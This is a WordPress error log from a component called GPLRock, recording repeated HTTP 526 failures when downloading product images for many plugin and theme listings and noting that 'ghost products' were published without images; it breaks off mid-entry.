[04-Apr-2026 21:24:07 UTC] GPLRock: Image download failed for product localcoins-ultimate-peer-to-peer-crypto-exchange-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/localcoins---ultimate-peer-to-peer-crypto-exchange-platform-26082.webp for product localcoins-ultimate-peer-to-peer-crypto-exchange-platform after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:10 UTC] GPLRock: Image download failed for product localcoins-ultimate-peer-to-peer-crypto-exchange-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:12 UTC] GPLRock: Image download failed for product localcoins-ultimate-peer-to-peer-crypto-exchange-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/localcoins---ultimate-peer-to-peer-crypto-exchange-platform-26082.webp for product localcoins-ultimate-peer-to-peer-crypto-exchange-platform after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:14 UTC] GPLRock WARNING: Image download failed for product localcoins-ultimate-peer-to-peer-crypto-exchange-platform. URL: https://meldwp.com/wp-content/uploads/localcoins---ultimate-peer-to-peer-crypto-exchange-platform-26082.webp [04-Apr-2026 21:24:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: localcoins-ultimate-peer-to-peer-crypto-exchange-platform [04-Apr-2026 21:24:14 UTC] GPLRock: Image download failed for product woocommerce-biometric-login-fingerprint-web-authentication-webauthn (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:16 UTC] GPLRock: Image download failed for product woocommerce-biometric-login-fingerprint-web-authentication-webauthn (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-biometric-login--fingerprint--web-authentication-webauthn-23853.webp for product woocommerce-biometric-login-fingerprint-web-authentication-webauthn after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:19 UTC] GPLRock: Image download failed for product woocommerce-biometric-login-fingerprint-web-authentication-webauthn (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:21 UTC] GPLRock: Image download failed for product woocommerce-biometric-login-fingerprint-web-authentication-webauthn (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-biometric-login--fingerprint--web-authentication-webauthn-23853.webp for product woocommerce-biometric-login-fingerprint-web-authentication-webauthn after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:23 UTC] GPLRock WARNING: Image download failed for product woocommerce-biometric-login-fingerprint-web-authentication-webauthn. URL: https://meldwp.com/wp-content/uploads/woocommerce-biometric-login--fingerprint--web-authentication-webauthn-23853.webp [04-Apr-2026 21:24:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-biometric-login-fingerprint-web-authentication-webauthn [04-Apr-2026 21:24:23 UTC] GPLRock: Image download failed for product connect-video-conference-online-meetings-live-class-webinar-whiteboard-live-chat (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:25 UTC] GPLRock: Image download failed for product connect-video-conference-online-meetings-live-class-webinar-whiteboard-live-chat (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/connect---video-conference-online-meetings-live-class--webinar-whiteboard-live-c-7748.webp for product connect-video-conference-online-meetings-live-class-webinar-whiteboard-live-chat after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:27 UTC] GPLRock: Image download failed for product connect-video-conference-online-meetings-live-class-webinar-whiteboard-live-chat (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:29 UTC] GPLRock: Image download failed for product connect-video-conference-online-meetings-live-class-webinar-whiteboard-live-chat (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/connect---video-conference-online-meetings-live-class--webinar-whiteboard-live-c-7748.webp for product connect-video-conference-online-meetings-live-class-webinar-whiteboard-live-chat after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:31 UTC] GPLRock WARNING: Image download failed for product connect-video-conference-online-meetings-live-class-webinar-whiteboard-live-chat. URL: https://meldwp.com/wp-content/uploads/connect---video-conference-online-meetings-live-class--webinar-whiteboard-live-c-7748.webp [04-Apr-2026 21:24:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: connect-video-conference-online-meetings-live-class-webinar-whiteboard-live-chat [04-Apr-2026 21:24:31 UTC] GPLRock: Image download failed for product woocommerce-mirror-configurator-custom-size-frame-designer-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:34 UTC] GPLRock: Image download failed for product woocommerce-mirror-configurator-custom-size-frame-designer-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-mirror-configurator--custom-size--frame-designer-plugin-11633.webp for product woocommerce-mirror-configurator-custom-size-frame-designer-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:36 UTC] GPLRock: Image download failed for product woocommerce-mirror-configurator-custom-size-frame-designer-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:38 UTC] GPLRock: Image download failed for product woocommerce-mirror-configurator-custom-size-frame-designer-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-mirror-configurator--custom-size--frame-designer-plugin-11633.webp for product woocommerce-mirror-configurator-custom-size-frame-designer-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:40 UTC] GPLRock WARNING: Image download failed for product woocommerce-mirror-configurator-custom-size-frame-designer-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-mirror-configurator--custom-size--frame-designer-plugin-11633.webp [04-Apr-2026 21:24:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-mirror-configurator-custom-size-frame-designer-plugin [04-Apr-2026 21:24:40 UTC] GPLRock: Image download failed for product woocommerce-reserve-stock-reserve-quantity-on-add-to-cart (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:42 UTC] GPLRock: Image download failed for product woocommerce-reserve-stock-reserve-quantity-on-add-to-cart (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-reserve-stock-reserve-quantity-on-add-to-cart-4904.webp for product woocommerce-reserve-stock-reserve-quantity-on-add-to-cart after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:45 UTC] GPLRock: Image download failed for product woocommerce-reserve-stock-reserve-quantity-on-add-to-cart (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:47 UTC] GPLRock: Image download failed for product woocommerce-reserve-stock-reserve-quantity-on-add-to-cart (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-reserve-stock-reserve-quantity-on-add-to-cart-4904.webp for product woocommerce-reserve-stock-reserve-quantity-on-add-to-cart after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:49 UTC] GPLRock WARNING: Image download failed for product woocommerce-reserve-stock-reserve-quantity-on-add-to-cart. URL: https://meldwp.com/wp-content/uploads/woocommerce-reserve-stock-reserve-quantity-on-add-to-cart-4904.webp [04-Apr-2026 21:24:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-reserve-stock-reserve-quantity-on-add-to-cart [04-Apr-2026 21:24:49 UTC] GPLRock: Image download failed for product premium-charts-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:51 UTC] GPLRock: Image download failed for product premium-charts-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-charts-for-elementor-10945.webp for product premium-charts-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:53 UTC] GPLRock: Image download failed for product premium-charts-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:55 UTC] GPLRock: Image download failed for product premium-charts-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-charts-for-elementor-10945.webp for product premium-charts-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:58 UTC] GPLRock WARNING: Image download failed for product premium-charts-for-elementor. URL: https://meldwp.com/wp-content/uploads/premium-charts-for-elementor-10945.webp [04-Apr-2026 21:24:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: premium-charts-for-elementor [04-Apr-2026 21:24:58 UTC] GPLRock: Image download failed for product ajax-search-pro-live-wordpress-search-filter-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:00 UTC] GPLRock: Image download failed for product ajax-search-pro-live-wordpress-search-filter-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ajax-search-pro---live-wordpress-search--filter-plugin-5470.webp for product ajax-search-pro-live-wordpress-search-filter-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:25:02 UTC] GPLRock: Image download failed for product ajax-search-pro-live-wordpress-search-filter-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:04 UTC] GPLRock: Image download failed for product ajax-search-pro-live-wordpress-search-filter-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ajax-search-pro---live-wordpress-search--filter-plugin-5470.webp for product ajax-search-pro-live-wordpress-search-filter-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:25:06 UTC] GPLRock WARNING: Image download failed for product ajax-search-pro-live-wordpress-search-filter-plugin. URL: https://meldwp.com/wp-content/uploads/ajax-search-pro---live-wordpress-search--filter-plugin-5470.webp [04-Apr-2026 21:25:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ajax-search-pro-live-wordpress-search-filter-plugin [04-Apr-2026 21:25:06 UTC] GPLRock: Image download failed for product woocommerce-upsells-and-related-products-upseller (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:09 UTC] GPLRock: Image download failed for product woocommerce-upsells-and-related-products-upseller (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-upsells-and-related-products--upseller-16386.webp for product woocommerce-upsells-and-related-products-upseller after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:25:11 UTC] GPLRock: Image download failed for product woocommerce-upsells-and-related-products-upseller (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:13 UTC] GPLRock: Image download failed for product woocommerce-upsells-and-related-products-upseller (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-upsells-and-related-products--upseller-16386.webp for product woocommerce-upsells-and-related-products-upseller after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:25:15 UTC] GPLRock WARNING: Image download failed for product woocommerce-upsells-and-related-products-upseller. URL: https://meldwp.com/wp-content/uploads/woocommerce-upsells-and-related-products--upseller-16386.webp [04-Apr-2026 21:25:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-upsells-and-related-products-upseller [04-Apr-2026 21:25:33 UTC] GPLRock: Image download failed for product url-to-rss-custom-curated-rss-feeds-rss-from-any-site (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:35 UTC] GPLRock: Image download failed for product url-to-rss-custom-curated-rss-feeds-rss-from-any-site (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/url-to-rss---custom-curated-rss-feeds-rss-from-any-site-7370.webp for product url-to-rss-custom-curated-rss-feeds-rss-from-any-site after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:25:37 UTC] GPLRock: Image download failed for product url-to-rss-custom-curated-rss-feeds-rss-from-any-site (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:39 UTC] GPLRock: Image download failed for product url-to-rss-custom-curated-rss-feeds-rss-from-any-site (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/url-to-rss---custom-curated-rss-feeds-rss-from-any-site-7370.webp for product url-to-rss-custom-curated-rss-feeds-rss-from-any-site after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:25:41 UTC] GPLRock WARNING: Image download failed for product url-to-rss-custom-curated-rss-feeds-rss-from-any-site. URL: https://meldwp.com/wp-content/uploads/url-to-rss---custom-curated-rss-feeds-rss-from-any-site-7370.webp [04-Apr-2026 21:25:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: url-to-rss-custom-curated-rss-feeds-rss-from-any-site [04-Apr-2026 21:25:41 UTC] GPLRock: Image download failed for product ninja-forms-limit-checkboxes (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:43 UTC] GPLRock: Image download failed for product ninja-forms-limit-checkboxes (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninja-forms---limit-checkboxes-19195.webp for product ninja-forms-limit-checkboxes after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:25:46 UTC] GPLRock: Image download failed for product ninja-forms-limit-checkboxes (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:48 UTC] GPLRock: Image download failed for product ninja-forms-limit-checkboxes (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninja-forms---limit-checkboxes-19195.webp for product ninja-forms-limit-checkboxes after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:25:50 UTC] GPLRock WARNING: Image download failed for product ninja-forms-limit-checkboxes. URL: https://meldwp.com/wp-content/uploads/ninja-forms---limit-checkboxes-19195.webp [04-Apr-2026 21:25:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ninja-forms-limit-checkboxes [04-Apr-2026 21:25:50 UTC] GPLRock: Image download failed for product duos-product-tabs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:52 UTC] GPLRock: Image download failed for product duos-product-tabs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/duos-product-tabs-4900.webp for product duos-product-tabs after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:25:54 UTC] GPLRock: Image download failed for product duos-product-tabs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:56 UTC] GPLRock: Image download failed for product duos-product-tabs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:25:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/duos-product-tabs-4900.webp for product duos-product-tabs after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:25:59 UTC] GPLRock WARNING: Image download failed for product duos-product-tabs. URL: https://meldwp.com/wp-content/uploads/duos-product-tabs-4900.webp [04-Apr-2026 21:25:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: duos-product-tabs [04-Apr-2026 21:25:59 UTC] GPLRock: Image download failed for product woocommerce-request-a-quote-plugin-ask-for-quotation (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:01 UTC] GPLRock: Image download failed for product woocommerce-request-a-quote-plugin-ask-for-quotation (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-request-a-quote-plugin---ask-for-quotation-25588.webp for product woocommerce-request-a-quote-plugin-ask-for-quotation after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:03 UTC] GPLRock: Image download failed for product woocommerce-request-a-quote-plugin-ask-for-quotation (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:05 UTC] GPLRock: Image download failed for product woocommerce-request-a-quote-plugin-ask-for-quotation (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-request-a-quote-plugin---ask-for-quotation-25588.webp for product woocommerce-request-a-quote-plugin-ask-for-quotation after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:07 UTC] GPLRock WARNING: Image download failed for product woocommerce-request-a-quote-plugin-ask-for-quotation. URL: https://meldwp.com/wp-content/uploads/woocommerce-request-a-quote-plugin---ask-for-quotation-25588.webp [04-Apr-2026 21:26:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-request-a-quote-plugin-ask-for-quotation [04-Apr-2026 21:26:07 UTC] GPLRock: Image download failed for product logos-showcase-pro-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:10 UTC] GPLRock: Image download failed for product logos-showcase-pro-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logos-showcase-pro---addon-for-wpbakery-page-builder-33001.webp for product logos-showcase-pro-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:12 UTC] GPLRock: Image download failed for product logos-showcase-pro-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:14 UTC] GPLRock: Image download failed for product logos-showcase-pro-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logos-showcase-pro---addon-for-wpbakery-page-builder-33001.webp for product logos-showcase-pro-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:16 UTC] GPLRock WARNING: Image download failed for product logos-showcase-pro-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/logos-showcase-pro---addon-for-wpbakery-page-builder-33001.webp [04-Apr-2026 21:26:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: logos-showcase-pro-addon-for-wpbakery-page-builder [04-Apr-2026 21:26:16 UTC] GPLRock: Image download failed for product woocommrece-product-price-visibility (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:18 UTC] GPLRock: Image download failed for product woocommrece-product-price-visibility (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommrece-product-price-visibility-13966.webp for product woocommrece-product-price-visibility after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:20 UTC] GPLRock: Image download failed for product woocommrece-product-price-visibility (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:23 UTC] GPLRock: Image download failed for product woocommrece-product-price-visibility (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommrece-product-price-visibility-13966.webp for product woocommrece-product-price-visibility after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:25 UTC] GPLRock WARNING: Image download failed for product woocommrece-product-price-visibility. URL: https://meldwp.com/wp-content/uploads/woocommrece-product-price-visibility-13966.webp [04-Apr-2026 21:26:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommrece-product-price-visibility [04-Apr-2026 21:26:25 UTC] GPLRock: Image download failed for product woocommerce-online-product-designer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:27 UTC] GPLRock: Image download failed for product woocommerce-online-product-designer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-online-product-designer-17466.webp for product woocommerce-online-product-designer after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:29 UTC] GPLRock: Image download failed for product woocommerce-online-product-designer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:31 UTC] GPLRock: Image download failed for product woocommerce-online-product-designer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-online-product-designer-17466.webp for product woocommerce-online-product-designer after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:33 UTC] GPLRock WARNING: Image download failed for product woocommerce-online-product-designer. URL: https://meldwp.com/wp-content/uploads/woocommerce-online-product-designer-17466.webp [04-Apr-2026 21:26:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-online-product-designer [04-Apr-2026 21:26:34 UTC] GPLRock: Image download failed for product whatsapp-click-to-chat-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:36 UTC] GPLRock: Image download failed for product whatsapp-click-to-chat-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whatsapp-click-to-chat-plugin-for-wordpress-24157.webp for product whatsapp-click-to-chat-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:38 UTC] GPLRock: Image download failed for product whatsapp-click-to-chat-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:40 UTC] GPLRock: Image download failed for product whatsapp-click-to-chat-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whatsapp-click-to-chat-plugin-for-wordpress-24157.webp for product whatsapp-click-to-chat-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:42 UTC] GPLRock WARNING: Image download failed for product whatsapp-click-to-chat-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/whatsapp-click-to-chat-plugin-for-wordpress-24157.webp [04-Apr-2026 21:26:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: whatsapp-click-to-chat-plugin-for-wordpress [04-Apr-2026 21:26:42 UTC] GPLRock: Image downloaded successfully for product wpbookit-whatsapp-notification-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff963744.webp [04-Apr-2026 21:26:42 UTC] GPLRock: Using pre-downloaded image for product wpbookit-whatsapp-notification-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff963744.webp [04-Apr-2026 21:26:42 UTC] GPLRock: Ghost product published with image - Product ID: wpbookit-whatsapp-notification-addon [04-Apr-2026 21:26:42 UTC] GPLRock: Image download failed for product chatbot-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:44 UTC] GPLRock: Image download failed for product chatbot-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chatbot-for-woocommerce-19745.webp for product chatbot-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:47 UTC] GPLRock: Image download failed for product chatbot-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:49 UTC] GPLRock: Image download failed for product chatbot-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:26:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chatbot-for-woocommerce-19745.webp for product chatbot-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:26:51 UTC] GPLRock WARNING: Image download failed for product chatbot-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/chatbot-for-woocommerce-19745.webp [04-Apr-2026 21:26:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chatbot-for-woocommerce [04-Apr-2026 21:27:04 UTC] GPLRock: Image download failed for product muntech-it-solutions-technology-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:06 UTC] GPLRock: Image download failed for product muntech-it-solutions-technology-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muntech---it-solutions--technology-theme-10779.webp for product muntech-it-solutions-technology-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:08 UTC] GPLRock: Image download failed for product muntech-it-solutions-technology-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:10 UTC] GPLRock: Image download failed for product muntech-it-solutions-technology-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muntech---it-solutions--technology-theme-10779.webp for product muntech-it-solutions-technology-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:13 UTC] GPLRock WARNING: Image download failed for product muntech-it-solutions-technology-theme. URL: https://meldwp.com/wp-content/uploads/muntech---it-solutions--technology-theme-10779.webp [04-Apr-2026 21:27:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: muntech-it-solutions-technology-theme [04-Apr-2026 21:27:13 UTC] GPLRock: Image download failed for product lister-business-directory-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:15 UTC] GPLRock: Image download failed for product lister-business-directory-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lister---business-directory--listing-wordpress-theme-33175.webp for product lister-business-directory-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:17 UTC] GPLRock: Image download failed for product lister-business-directory-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:19 UTC] GPLRock: Image download failed for product lister-business-directory-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lister---business-directory--listing-wordpress-theme-33175.webp for product lister-business-directory-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:21 UTC] GPLRock WARNING: Image download failed for product lister-business-directory-listing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lister---business-directory--listing-wordpress-theme-33175.webp [04-Apr-2026 21:27:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lister-business-directory-listing-wordpress-theme [04-Apr-2026 21:27:21 UTC] GPLRock: Image download failed for product serano-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:23 UTC] GPLRock: Image download failed for product serano-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/serano---creative-portfolio-wordpress-theme-2880.webp for product serano-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:26 UTC] GPLRock: Image download failed for product serano-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:28 UTC] GPLRock: Image download failed for product serano-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/serano---creative-portfolio-wordpress-theme-2880.webp for product serano-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:30 